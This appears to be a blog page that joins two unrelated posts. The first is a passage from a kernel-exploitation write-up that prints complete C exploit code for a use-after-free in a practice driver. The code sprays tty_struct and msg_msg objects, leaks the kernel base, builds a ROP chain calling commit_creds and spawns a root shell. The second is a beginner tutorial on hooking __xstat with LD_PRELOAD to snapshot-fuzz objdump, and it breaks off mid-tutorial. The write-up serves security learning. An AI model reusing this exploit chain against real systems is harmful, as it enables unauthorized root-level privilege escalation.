    memset(msg.mtext, 0, MSG_SZ);

    // Pattern for offsets (debugging)
    uint64_t base = 0x41;
    uint64_t *curr = (uint64_t *)&msg.mtext[0];
    for (size_t i = 0; i < 25; i++) {
        uint64_t fill = base << 56;
        fill |= base << 48;
        fill |= base << 40;
        fill |= base << 32;
        fill |= base << 24;
        fill |= base << 16;
        fill |= base << 8;
        fill |= base;
        
        *curr++ = fill;
        base++; 
    }

    // ROP chain
    uint64_t *rop = (uint64_t *)&msg.mtext[0];
    *rop++ = pop_rdi; 
    *rop++ = 0x0;
    *rop++ = prepare_kernel_cred; // RAX now holds ptr to new creds
    *rop++ = xchg_rdi_rax; // Place creds into RDI 
    *rop++ = commit_creds; // Now we have super powers
    *rop++ = kpti_tramp;
    *rop++ = 0x0; // pop rax inside kpti_tramp
    *rop++ = 0x0; // pop rdi inside kpti_tramp
    *rop++ = (uint64_t)pop_shell; // Return here
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop   = user_ss;

    /* struct tty_operations {
        struct tty_struct * (*lookup)(struct tty_driver *driver,
                struct file *filp, int idx);
        int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
        void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
        int  (*open)(struct tty_struct * tty, struct file * filp);
        void (*close)(struct tty_struct * tty, struct file * filp);
        void (*shutdown)(struct tty_struct *tty);
        void (*cleanup)(struct tty_struct *tty);
        int  (*write)(struct tty_struct * tty,
                const unsigned char *buf, int count);
        int  (*put_char)(struct tty_struct *tty, unsigned char ch);
        void (*flush_chars)(struct tty_struct *tty);
        unsigned int (*write_room)(struct tty_struct *tty);
        unsigned int (*chars_in_buffer)(struct tty_struct *tty);
        int  (*ioctl)(struct tty_struct *tty,
                unsigned int cmd, unsigned long arg);
        ...
    } */

    // Populate the 12 function pointers in the table that we have created.
    // There are 3 handlers that are invoked for allocated tty_structs when 
    // their controlling process exits, they are close(), shutdown(),
    // and cleanup(). We have to overwrite these pointers for when we exit our
    // exploit process or else the kernel will panic with a RIP of 
    // 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget
    uint64_t *func_table = (uint64_t *)&msg.mtext[rop_len];
    for (size_t i = 0; i < 12; i++) {
        // If i == 4, we're on the close() handler, set to ret gadget
        if (i == 4) { *func_table++ = ret; continue; }

        // If i == 5, we're on the shutdown() handler, set to ret gadget
        if (i == 5) { *func_table++ = ret; continue; }

        // If i == 6, we're on the cleanup() handler, set to ret gadget
        if (i == 6) { *func_table++ = ret; continue; }

        // Magic value for debugging
        *func_table++ = 0xdeadbeefdeadbe00 + i;
    }

    // Put our gadget address as the ioctl() handler to pivot stack
    *func_table = push_rdx;

    // Spray msg_msg's on the heap
    if (msgsnd(curr_q, &msg, MSG_SZ, IPC_NOWAIT) == -1) {
        fails++;
    }

    return fails;
}

I got a bit wordy with the comments in this block, but it’s for good reason. I didn’t want the exploit to ruin the kernel state, I wanted to exit cleanly. This presented a problem as we are completely hi-jacking the ops function table which the kernel will use to cleanup our tty_struct. So I found a gadget that simply performs a ret operation, and overwrote the function pointers for close(), shutdown(), and cleanup() so that when they are invoked, they simply return and the kernel is apparently fine with this and doesn’t panic.

So our message body looks something like: <—-ROP—-Faked Function Table—->

Here is the code I used to overwrite the tty_struct->ops pointer:

void overwrite_ops(int fd) {
    unsigned char g_buf[GBUF_SZ] = { 0 };
    ssize_t bytes_read = read(fd, g_buf, GBUF_SZ);
    if (bytes_read != (ssize_t)GBUF_SZ) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    // Overwrite the tty_struct->ops pointer with ROP address
    *(uint64_t *)&g_buf[24] = fake_table;
    ssize_t bytes_written = write(fd, g_buf, GBUF_SZ);
    if (bytes_written != (ssize_t)GBUF_SZ) {
        err("Failed to write enough bytes to fd: %d", fd);
    }
}

So now that we know where our ROP chain is, and where our faked function table is, and we have the perfect stack pivot gadget, the rest of this process is simply building a real ROP chain which I will leave out of this post.

As a first timer, this tiny bit of creativity to leverage the read ability to leak the addresses of msg_msg structs was enough to get me hooked. Here is a picture of the exploit in action:

Miscellaneous

There were some things I tried to do to increase the exploit’s reliability.

One was to check the magic value in the leaked tty_structs to make sure a tty_struct had actually filled our freed memory and not another object. This is extremely convenient! All tty_structs have 0x5401 at tty->magic.

Another thing I did was spray msg_msg structs with an easily recognizable message type of 0x1337. This way when leaked, I could easily verify I was in fact leaking msg_msg contents and not some other arbitrary data structure. Another thing you could do would be to make sure supposed kernel addresses start with 0xffff.

Finally, there was the patching of the clean-up-related function pointers in tty->ops.

Exploit Code

// One liner to add exploit to filesystem
// gcc exploit.c -o exploit -static && cp exploit rootfs && cd rootfs && find . -print0 | cpio -o --format=newc --null --owner=root > ../rootfs.cpio && cd ../

#include  /* printf */
#include  /* open */
#include  /* open */
#include  /* open */
#include  /* exit */
#include  /* int_t's */
#include  /* getuid */
#include  /* memset */
#include  /* msg_msg */ 
#include  /* msg_msg */
#include  /* ioctl */
#include  /* va_args */
#include  /* true, false */ 

#define DEV "/dev/holstein"
#define PTMX "/dev/ptmx"

#define PTMX_SPRAY (size_t)50       // Number of terminals to allocate
#define MSG_SPRAY (size_t)32        // Number of msg_msg's per queue
#define NUM_QUEUE (size_t)4         // Number of msg queues
#define MSG_SZ (size_t)512          // Size of each msg_msg, modulo 8 == 0
#define GBUF_SZ (size_t)0x400       // Size of g_buf in driver

// User state globals
uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rflags;
uint64_t user_sp;

// Mutable globals, when in Rome
uint64_t base;
uint64_t rop_addr;
uint64_t fake_table;
uint64_t ioctl_ptr;
int open_ptmx[PTMX_SPRAY] = { 0 };          // Store fds for clean up/ioctl()
int num_ptmx = 0;                           // Number of open fds
int msg_queue[NUM_QUEUE] = { 0 };           // Initialized message queues
int num_queue = 0;

// Misc constants. 
const uint64_t rop_len = 200;
const uint64_t ioctl_off = 12 * sizeof(uint64_t);

// Gadgets
// 0x723c0: commit_creds
uint64_t commit_creds;
// 0x72560: prepare_kernel_cred
uint64_t prepare_kernel_cred;
// 0x800e10: swapgs_restore_regs_and_return_to_usermode
uint64_t kpti_tramp;
// 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret; (stack pivot)
uint64_t push_rdx;
// 0x35738d: pop rdi; ret;
uint64_t pop_rdi;
// 0x487980: xchg rdi, rax; sar bh, 0x89; ret;
uint64_t xchg_rdi_rax;
// 0x32afea: ret;
uint64_t ret;

void err(const char* format, ...) {
    if (!format) {
        exit(-1);
    }

    fprintf(stderr, "%s", "[!] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, "%s", "\n");
    exit(-1);
}

void info(const char* format, ...) {
    if (!format) {
        return;
    }
    
    fprintf(stderr, "%s", "[*] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, "%s", "\n");
}

void save_state(void) {
    __asm__(
        ".intel_syntax noprefix;"   
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        // Push CPU flags onto stack
        "pushf;"
        // Pop CPU flags into var
        "pop user_rflags;"
        ".att_syntax;"
    );
}

// Should spawn a root shell
void pop_shell(void) {
    uid_t uid = getuid();
    if (uid != 0) {
        err("We are not root, wtf?");
    }

    info("We got root, spawning shell!");
    system("/bin/sh");
    exit(0);
}

// Open a char device, just exit on error, this is exploit code
int open_device(char *dev, int flags) {
    int fd = -1;
    if (!dev) {
        err("NULL ptr given to `open_device()`");
    }

    fd = open(dev, flags);
    if (fd < 0) {
        err("Failed to open '%s'", dev);
    }

    return fd;
}

// Spray kmalloc-1024 sized '/dev/ptmx' structures on the kernel heap
void alloc_ptmx() {
    int fd = open("/dev/ptmx", O_RDONLY | O_NOCTTY);
    if (fd < 0) {
        err("Failed to open /dev/ptmx");
    }

    open_ptmx[num_ptmx] = fd;
    num_ptmx++;
}

// Check to see if we have a reference to a tty_struct by reading in the magic
// number for the current allocation in our slab
bool found_ptmx(int fd) {
    unsigned char magic_buf[4];
    if (fd < 0) {
        err("Bad fd given to `found_ptmx()`\n");
    }

    ssize_t bytes_read = read(fd, magic_buf, 4);
    if (bytes_read != (ssize_t)bytes_read) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    if (*(int32_t *)magic_buf != 0x5401) {
        return false;
    }

    return true;
}

// Leak a tty_struct->ops field which is constant offset from kernel base
uint64_t leak_ops(int fd) {
    if (fd < 0) {
        err("Bad fd given to `leak_ops()`");
    }

    /* tty_struct {
        int magic;      // 4 bytes
        struct kref;    // 4 bytes (single member is an int refcount_t)
        struct device *dev; // 8 bytes
        struct tty_driver *driver; // 8 bytes
        const struct tty_operations *ops; (offset 24 (or 0x18))
        ...
    } */

    // Read first 32 bytes of the structure
    unsigned char *ops_buf = calloc(1, 32);
    if (!ops_buf) {
        err("Failed to allocate ops_buf");
    }

    ssize_t bytes_read = read(fd, ops_buf, 32);
    if (bytes_read != (ssize_t)32) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    uint64_t ops = *(uint64_t *)&ops_buf[24];
    info("tty_struct->ops: 0x%lx", ops);

    // Solve for kernel base, keep the last 12 bits
    uint64_t test = ops & 0b111111111111;

    // These magic compares are for static offsets on this kernel
    if (test == 0xb40ULL) {
        return ops - 0xc39b40ULL;
    }

    else if (test == 0xc60ULL) {
        return ops - 0xc39c60ULL;
    }

    else {
        err("Got an unexpected tty_struct->ops ptr");
    }
}

void solve_gadgets(void) {
    // 0x723c0: commit_creds
    commit_creds = base + 0x723c0ULL;
    printf("    >> commit_creds located @ 0x%lx\n", commit_creds);

    // 0x72560: prepare_kernel_cred
    prepare_kernel_cred = base + 0x72560ULL;
    printf("    >> prepare_kernel_cred located @ 0x%lx\n", prepare_kernel_cred);

    // 0x800e10: swapgs_restore_regs_and_return_to_usermode
    kpti_tramp = base + 0x800e10ULL + 22; // 22 offset, avoid pops
    printf("    >> kpti_tramp located @ 0x%lx\n", kpti_tramp);

    // 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;
    push_rdx = base + 0x14fbeaULL;
    printf("    >> push_rdx located @ 0x%lx\n", push_rdx);

    // 0x35738d: pop rdi; ret;
    pop_rdi = base + 0x35738dULL;
    printf("    >> pop_rdi located @ 0x%lx\n", pop_rdi);

    // 0x487980: xchg rdi, rax; sar bh, 0x89; ret;
    xchg_rdi_rax = base + 0x487980ULL;
    printf("    >> xchg_rdi_rax located @ 0x%lx\n", xchg_rdi_rax);

    // 0x32afea: ret;
    ret = base + 0x32afeaULL;
    printf("    >> ret located @ 0x%lx\n", ret);
}

// Initialize a kernel message queue
int init_msg_q(void) {
    int msg_qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    if (msg_qid == -1) {
        err("`msgget()` failed to initialize queue");
    }

    msg_queue[num_queue] = msg_qid;
    num_queue++;
}

// Allocate one msg_msg on the heap
size_t send_message() {
    // Calcuate current queue
    if (num_queue < 1) {
        err("`send_message()` called with no message queues");
    }
    int curr_q = msg_queue[num_queue - 1];

    // Send message
    size_t fails = 0;
    struct msgbuf {
        long mtype;
        char mtext[MSG_SZ];
    } msg;

    // Unique identifier we can use
    msg.mtype = 0x1337;

    // Construct the ROP chain
    memset(msg.mtext, 0, MSG_SZ);

    // Pattern for offsets (debugging)
    uint64_t base = 0x41;
    uint64_t *curr = (uint64_t *)&msg.mtext[0];
    for (size_t i = 0; i < 25; i++) {
        uint64_t fill = base << 56;
        fill |= base << 48;
        fill |= base << 40;
        fill |= base << 32;
        fill |= base << 24;
        fill |= base << 16;
        fill |= base << 8;
        fill |= base;
        
        *curr++ = fill;
        base++; 
    }

    // ROP chain
    uint64_t *rop = (uint64_t *)&msg.mtext[0];
    *rop++ = pop_rdi; 
    *rop++ = 0x0;
    *rop++ = prepare_kernel_cred; // RAX now holds ptr to new creds
    *rop++ = xchg_rdi_rax; // Place creds into RDI 
    *rop++ = commit_creds; // Now we have super powers
    *rop++ = kpti_tramp;
    *rop++ = 0x0; // pop rax inside kpti_tramp
    *rop++ = 0x0; // pop rdi inside kpti_tramp
    *rop++ = (uint64_t)pop_shell; // Return here
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop   = user_ss;

    /* struct tty_operations {
        struct tty_struct * (*lookup)(struct tty_driver *driver,
                struct file *filp, int idx);
        int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
        void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
        int  (*open)(struct tty_struct * tty, struct file * filp);
        void (*close)(struct tty_struct * tty, struct file * filp);
        void (*shutdown)(struct tty_struct *tty);
        void (*cleanup)(struct tty_struct *tty);
        int  (*write)(struct tty_struct * tty,
                const unsigned char *buf, int count);
        int  (*put_char)(struct tty_struct *tty, unsigned char ch);
        void (*flush_chars)(struct tty_struct *tty);
        unsigned int (*write_room)(struct tty_struct *tty);
        unsigned int (*chars_in_buffer)(struct tty_struct *tty);
        int  (*ioctl)(struct tty_struct *tty,
                unsigned int cmd, unsigned long arg);
        ...
    } */

    // Populate the 12 function pointers in the table that we have created.
    // There are 3 handlers that are invoked for allocated tty_structs when 
    // their controlling process exits, they are close(), shutdown(),
    // and cleanup(). We have to overwrite these pointers for when we exit our
    // exploit process or else the kernel will panic with a RIP of 
    // 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget
    uint64_t *func_table = (uint64_t *)&msg.mtext[rop_len];
    for (size_t i = 0; i < 12; i++) {
        // If i == 4, we're on the close() handler, set to ret gadget
        if (i == 4) { *func_table++ = ret; continue; }

        // If i == 5, we're on the shutdown() handler, set to ret gadget
        if (i == 5) { *func_table++ = ret; continue; }

        // If i == 6, we're on the cleanup() handler, set to ret gadget
        if (i == 6) { *func_table++ = ret; continue; }

        // Magic value for debugging
        *func_table++ = 0xdeadbeefdeadbe00 + i;
    }

    // Put our gadget address as the ioctl() handler to pivot stack
    *func_table = push_rdx;

    // Spray msg_msg's on the heap
    if (msgsnd(curr_q, &msg, MSG_SZ, IPC_NOWAIT) == -1) {
        fails++;
    }

    return fails;
}

// Check to see if we have a reference to one of our msg_msg structs
bool found_msg(int fd) {
    // Read out the msg_msg
    unsigned char msg_buf[GBUF_SZ] = { 0 };
    ssize_t bytes_read = read(fd, msg_buf, GBUF_SZ);
    if (bytes_read != (ssize_t)GBUF_SZ) {
        err("Failed to read from holstein");
    }

    /* msg_msg {
        struct list_head m_list {
            struct list_head *next, *prev;
        } // 16 bytes
        long m_type; // 8 bytes
        int m_ts; // 4 bytes
        struct msg_msgseg* next; // 8 bytes
        void *security; // 8 bytes

        ===== Body Starts Here (offset 48) =====
    }*/ 

    // Some heuristics to see if we indeed have a good msg_msg
    uint64_t next = *(uint64_t *)&msg_buf[0];
    uint64_t prev = *(uint64_t *)&msg_buf[sizeof(uint64_t)];
    int64_t m_type = *(uint64_t *)&msg_buf[sizeof(uint64_t) * 2];

    // Not one of our msg_msg structs
    if (m_type != 0x1337L) {
        return false;
    }

    // We have to have valid pointers
    if (next == 0 || prev == 0) {
        return false;
    }

    // I think the pointers should be different as well
    if (next == prev) {
        return false;
    }

    info("Found msg_msg struct:");
    printf("    >> msg_msg.m_list.next: 0x%lx\n", next);
    printf("    >> msg_msg.m_list.prev: 0x%lx\n", prev);
    printf("    >> msg_msg.m_type: 0x%lx\n", m_type);

    // Update rop address
    rop_addr = 48 + next;
    
    return true;
}

void overwrite_ops(int fd) {
    unsigned char g_buf[GBUF_SZ] = { 0 };
    ssize_t bytes_read = read(fd, g_buf, GBUF_SZ);
    if (bytes_read != (ssize_t)GBUF_SZ) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    // Overwrite the tty_struct->ops pointer with ROP address
    *(uint64_t *)&g_buf[24] = fake_table;
    ssize_t bytes_written = write(fd, g_buf, GBUF_SZ);
    if (bytes_written != (ssize_t)GBUF_SZ) {
        err("Failed to write enough bytes to fd: %d", fd);
    }
}

int main(int argc, char *argv[]) {
    int fd1;
    int fd2;
    int fd3;
    int fd4;
    int fd5;
    int fd6;

    info("Saving user space state...");
    save_state();

    info("Freeing fd1...");
    fd1 = open_device(DEV, O_RDWR);
    fd2 = open(DEV, O_RDWR);
    close(fd1);

    // Allocate '/dev/ptmx' structs until we allocate one in our free'd slab
    info("Spraying tty_structs...");
    size_t p_remain = PTMX_SPRAY;
    while (p_remain--) {
        alloc_ptmx();
        printf("    >> tty_struct(s) alloc'd: %lu\n", PTMX_SPRAY - p_remain);

        // Check to see if we found one of our tty_structs
        if (found_ptmx(fd2)) {
            break;
        }

        if (p_remain == 0) { err("Failed to find tty_struct"); }
    }

    info("Leaking tty_struct->ops...");
    base = leak_ops(fd2);
    info("Kernel base: 0x%lx", base);

    // Clean up open fds
    info("Cleaning up our tty_structs...");
    for (size_t i = 0; i < num_ptmx; i++) {
        close(open_ptmx[i]);
        open_ptmx[i] = 0;
    }
    num_ptmx = 0;

    // Solve the gadget addresses now that we have base
    info("Solving gadget addresses");
    solve_gadgets();

    // Create a hole for a msg_msg
    info("Freeing fd3...");
    fd3 = open_device(DEV, O_RDWR);
    fd4 = open_device(DEV, O_RDWR);
    close(fd3);

    // Allocate msg_msg structs until we allocate one in our free'd slab
    size_t q_remain = NUM_QUEUE;
    size_t fails = 0;
    while (q_remain--) {
        // Initialize a message queue for spraying msg_msg structs
        init_msg_q();
        printf("    >> msg_msg queue(s) initialized: %lu\n",
            NUM_QUEUE - q_remain);
        
        // Spray messages for this queue
        for (size_t i = 0; i < MSG_SPRAY; i++) {
            fails += send_message();
        }

        // Check to see if we found a msg_msg struct
        if (found_msg(fd4)) {
            break;
        }
        
        if (q_remain == 0) { err("Failed to find msg_msg struct"); }
    }
    
    // Solve our ROP chain address
    info("`msgsnd()` failures: %lu", fails);
    info("ROP chain address: 0x%lx", rop_addr);
    fake_table = rop_addr + rop_len;
    info("Fake tty_struct->ops function table: 0x%lx", fake_table);
    ioctl_ptr = fake_table + ioctl_off;
    info("Fake ioctl() handler: 0x%lx", ioctl_ptr);

    // Do a 3rd UAF
    info("Freeing fd5...");
    fd5 = open_device(DEV, O_RDWR);
    fd6 = open_device(DEV, O_RDWR);
    close(fd5);

    // Spray more /dev/ptmx terminals
    info("Spraying tty_structs...");
    p_remain = PTMX_SPRAY;
    while(p_remain--) {
        alloc_ptmx();
        printf("    >> tty_struct(s) alloc'd: %lu\n", PTMX_SPRAY - p_remain);

        // Check to see if we found a tty_struct
        if (found_ptmx(fd6)) {
            break;
        }

        if (p_remain == 0) { err("Failed to find tty_struct"); }
    }

    info("Found new tty_struct");
    info("Overwriting tty_struct->ops pointer with fake table...");
    overwrite_ops(fd6);
    info("Overwrote tty_struct->ops");

    // Spam IOCTL on all of our '/dev/ptmx' fds
    info("Spamming `ioctl()`...");
    for (size_t i = 0; i < num_ptmx; i++) {
        ioctl(open_ptmx[i], 0xcafebabe, rop_addr - 8); // pop rbp; ret;
    }

    return 0;
}

Fuzzing Like A Caveman 6: Binary Only Snapshot Fuzzing Harness

2022-04-02T00:00:00+00:00

Introduction

It’s been a while since I’ve done one of these, and one of my goals this year is to do more so here we are. A side project of mine is kind of reaching a good stopping point so I’ll have more free-time to do my own research and blog again. Looking forward to sharing more and more this year.

One of the most common questions that comes up in beginner fuzzing circles (of which I’m obviously a member) is how to harness a target so that it can be fuzzed in memory, as some would call in ‘persistent’ fashion, in order to gain performance. Persistent fuzzing has a niche use-case where the target doesn’t touch much global state from fuzzcase to fuzzcase, an example would be a tight fuzzing loop for a single API in a library, or maybe a single function in a binary.

This style of fuzzing is faster than re-executing the target from scratch over and over as we bypass all the heavy syscalls/kernel routines associated with creating and destroying task structs.

However, with binary targets for which we don’t have source code, it’s sometimes hard to discern what global state we’re affecting while executing any code path without some heavy reverse engineering (disgusting, work? gross). Additionally, we often want to fuzz a wider loop. It doesn’t do us much good to fuzz a function which returns a struct that is then never read or consumed in our fuzzing workflow. With these things in mind, we often find that ‘snapshot’ fuzzing would be a more robust workflow for binary targets, or even production binaries for which, we have source, but have gone through the sausage factory of enterprise build systems.

So today, we’re going to learn how to take an arbitrary binary only target that takes an input file from the user and turn it into a target that takes its input from memory instead and lends itself well to having its state reset between fuzzcases.

Target (Easy Mode)

For the purposes of this blogpost, we’re going to harness objdump to be snapshot fuzzed. This will serve our purposes because it’s relatively simple (single threaded, single process) and it’s a common fuzzing target, especially as people do development work on their fuzzers. The point of this is not to impress you by sandboxing some insane target like Chrome, but to show beginners how to start thinking about harnessing. You want to lobotomize your targets so that they are unrecognizable to their original selves but retain the same semantics. You can get as creative as you want, and honestly, sometimes harnessing targets is some of the most satisfying work related to fuzzing. It feels great to successfully sandbox a target and have it play nice with your fuzzer. On to it then.

Hello World

The first step is to determine how we want to change objdump’s behavior. Let’s try running it under strace and disassemble ls and see how it behaves at the syscall level with strace objdump -D /bin/ls. What we’re looking for is the point where objdump starts interacting with our input, /bin/ls in this case. In the output, if you scroll down past the boilerplate stuff, you can see the first appearance of /bin/ls:

stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=133792, ...}) = 0
stat("/bin/ls", {st_mode=S_IFREG|0755, st_size=133792, ...}) = 0
openat(AT_FDCWD, "/bin/ls", O_RDONLY)   = 3
fcntl(3, F_GETFD)                       = 0
fcntl(3, F_SETFD, FD_CLOEXEC)           = 0

Keep in mind that as you read through this, if you’re following along at home, your output might not match mine exactly. I’m likely on a different distribution than you running a different objdump than you. But the point of the blogpost is to just show concepts that you can be creative on your own.

I also noticed that the program doesn’t close our input file until the end of execution:

read(3, "\0\0\0\0\0\0\0\0\10\0\"\0\0\0\0\0\1\0\0\0\377\377\377\377\1\0\0\0\0\0\0\0"..., 4096) = 2720
write(1, ":(%rax)\n  21ffa4:\t00 00         "..., 4096) = 4096
write(1, "x0,%eax\n  220105:\t00 00         "..., 4096) = 4096
close(3)                                = 0
write(1, "023e:\t00 00                \tadd "..., 2190) = 2190
exit_group(0)                           = ?
+++ exited with 0 +++

This is good to know, we’ll need our harness to be able to emulate an input file fairly well since objdump doesn’t just read our file into a memory buffer in one shot or mmap() the input file. It is continuously reading from the file throughout the strace output.

Since we don’t have source code for the target, we’re going to affect behavior by using an LD_PRELOAD shared object. By using an LD_PRELOAD shared object, we should be able to hook the wrapper functions around the syscalls that interact with our input file and change their behavior to suit our purposes. If you are unfamiliar with dynamic linking or LD_PRELOAD, this would be a good stopping point to go Google around for more information great starting point. For starters, let’s just get a Hello, World! shared object loaded.

We can utilize gcc Function Attributes to have our shared object execute code when it is loaded by the target by leveraging the constructor attribute.

So our code so far will look like this:

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#include  /* printf */

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    printf("** LD_PRELOAD shared object loaded!\n");
}

I added the compiler flags needed to compile to the top of the file as a comment. I got these flags from this blogpost on using LD_PRELOAD shared objects a while ago: https://tbrindus.ca/correct-ld-preload-hooking-libc/.

We can now use the LD_PRELOAD environment variable and run objdump with our shared object which should print when loaded:

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D /bin/ls > /tmp/output.txt && head -n 20 /tmp/output.txt
**> LD_PRELOAD shared object loaded!

/bin/ls:     file format elf64-x86-64


Disassembly of section .interp:

0000000000000238 <.interp>:
 238:   2f                      (bad)  
 239:   6c                      ins    BYTE PTR es:[rdi],dx
 23a:   69 62 36 34 2f 6c 64    imul   esp,DWORD PTR [rdx+0x36],0x646c2f34
 241:   2d 6c 69 6e 75          sub    eax,0x756e696c
 246:   78 2d                   js     275 <_init@@Base-0x34e3>
 248:   78 38                   js     282 <_init@@Base-0x34d6>
 24a:   36 2d 36 34 2e 73       ss sub eax,0x732e3436
 250:   6f                      outs   dx,DWORD PTR ds:[rsi]
 251:   2e 32 00                xor    al,BYTE PTR cs:[rax]

Disassembly of section .note.ABI-tag:

It works, now we can start looking for functions to hook.

Looking for Hooks

First thing we need to do, is create a fake file name to give objdump so that we can start testing things out. We will copy /bin/ls into the current working directory and call it fuzzme. This will allow us to generically play around with the harness for testing purposes. Now we have our strace output, we know that objdump calls stat() on the path for our input file (/bin/ls) a couple of times before we get that call to openat(). Since we know our file hasn’t been opened yet, and the syscall uses the path for the first arg, we can guess that this syscall results from the libc exported wrapper function for stat() or lstat(). I’m going to assume stat() since we aren’t dealing with any symbolic links for /bin/ls on my box. We can add a hook for stat() to test to see if we hit it and check if it’s being called for our target input file (now changed to fuzzme).

In order to create a hook, we will follow a pattern where we define a pointer to the real function via a typedef and then we will initialize the pointer as NULL. Once we need to resolve the location of the real function we are hooking, we can use dlsym(RLTD_NEXT, ) to get it’s location and change the pointer value to the real symbol address. (This will be more clear later on).

Now we need to hook stat() which appears as a man 3 entry here (meaning it’s a libc exported function) as well as a man 2 entry (meaning it is a syscall). This was confusing to me for the longest time and I often misunderstood how syscalls actually worked because of this insistence on naming collisions. You can read one of the first research blogposts I ever did here where the confusion is palpable and I often make erroneous claims. (PS, I’ll never edit the old blogposts with errors in them, they are like time capsules, and it’s kind of cool to me).

We want to write a function that when called, simply prints something and exits so that we know our hook was hit. For now, our code looks like this:

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#include  /* printf */
#include  /* stat */
#include  /* exit */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET "fuzzme"

// Declare a prototype for the real stat as a function pointer
typedef int (*stat_t)(const char *restrict path, struct stat *restrict buf);
stat_t real_stat = NULL;

// Hook function, objdump will call this stat instead of the real one
int stat(const char *restrict path, struct stat *restrict buf) {
    printf("** stat() hook!\n");
    exit(0);
}

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    printf("** LD_PRELOAD shared object loaded!\n");
}

However, if we compile and run that, we don’t ever print and exit so our hook is not being called. Something is going wrong. Sometimes, file related functions in libc have 64 variants, such as open() and open64() that are used somewhat interchangably depending on configurations and flags. I tried hooking a stat64() but still had no luck with the hook being reached.

Luckily, I’m not the first person with this problem, there is a great answer on Stackoverflow about the very issue that describes how libc doesn’t actually export stat() the same way it does for other functions like open() and open64(), instead it exports a symbol called __xstat() which has a slightly different signature and requires a new argument called version which is meant to describe which version of stat struct the caller is expecting. This is supposed to all happen magically under the hood but that’s where we live now, so we have to make the magic happen ourselves. The same rules apply for lstat() and fstat() as well, they have __lxstat() and __fxstat() respectively.

I found the definitions for the functions here. So we can add the __xstat() hook to our shared object in place of the stat() and see if our luck changes. Our code now looks like this:

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#include  /* printf */
#include  /* stat */
#include  /* exit */
#include  /* __xstat, __fxstat */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET "fuzzme"

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Hook function, objdump will call this stat instead of the real one
int __xstat(int __ver, const char *__filename, struct stat *__stat_buf) {
    printf("** Hit our __xstat() hook!\n");
    exit(0);
}

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    printf("** LD_PRELOAD shared object loaded!\n");
}

Now if we run our shared object, we get the desired outcome, somewhere, our hook is hit. Now we can help ourselves out a bit and print the filenames being requested by the hook and then actually call the real __xstat() on behalf of the caller. Now when our hook is hit, we will have to resolve the location of the real __xstat() by name, so we’ll add a symbol resolving function to our shared object. Our shared object code now looks like this:

/* 
Compiler flags: 
gcc -shared -Wall -Werror -fPIC blog_harness.c -o blog_harness.so -ldl
*/

#define _GNU_SOURCE     /* dlsym */
#include  /* printf */
#include  /* stat */
#include  /* exit */
#include  /* __xstat, __fxstat */
#include  /* dlsym and friends */

// Filename of the input file we're trying to emulate
#define FUZZ_TARGET "fuzzme"

// Declare a prototype for the real stat as a function pointer
typedef int (*__xstat_t)(int __ver, const char *__filename, struct stat *__stat_buf);
__xstat_t real_xstat = NULL;

// Returns memory address of *next* location of symbol in library search order
static void *_resolve_symbol(const char *symbol) {
    // Clear previous errors
    dlerror();

    // Get symbol address
    void* addr = dlsym(RTLD_NEXT, symbol);

    // Check for error
    char* err = NULL;
    err = dlerror();
    if (err) {
        addr = NULL;
        printf("Err resolving '%s' addr: %s\n", symbol, err);
        exit(-1);
    }
    
    return addr;
}

// Hook function, objdump will call this stat instead of the real one
int __xstat(int __ver, const char *__filename, struct stat *__stat_buf) {
    // Print the filename requested
    printf("** __xstat() hook called for filename: '%s'\n", __filename);

    // Resolve the address of the real __xstat() on demand and only once
    if (!real_xstat) {
        real_xstat = _resolve_symbol("__xstat");
    }

    // Call the real __xstat() for the caller so everything keeps going
    return real_xstat(__ver, __filename, __stat_buf);
}

// Routine to be called when our shared object is loaded
__attribute__((constructor)) static void _hook_load(void) {
    printf("** LD_PRELOAD shared object loaded!\n");
}

Ok so now when we run this, and we check for our print statements, things get a little spicy.

h0mbre@ubuntu:~/blogpost$ LD_PRELOAD=/home/h0mbre/blogpost/blog_harness.so objdump -D fuzzme > /tmp/output.txt && grep "** __xstat" /tmp/output.txt
** __xstat() hook called for filename: 'fuzzme'
** __xstat() hook called for filename: 'fuzzme'

So now we can have some fun.

__xstat() Hook

So the purpose of this hook will be to lie to objdump and make it think it successfully stat() the input file. Remember, we’re making a snapshot fuzzing harness so our objective is to constantly be creating new inputs and feeding them to objdump through this harness. Most importantly, our harness will need to be able to represent our variable length inputs (which will be stored purely in memory) as files. Each fuzzcase, the file length can change and our harness needs to accomodate that.

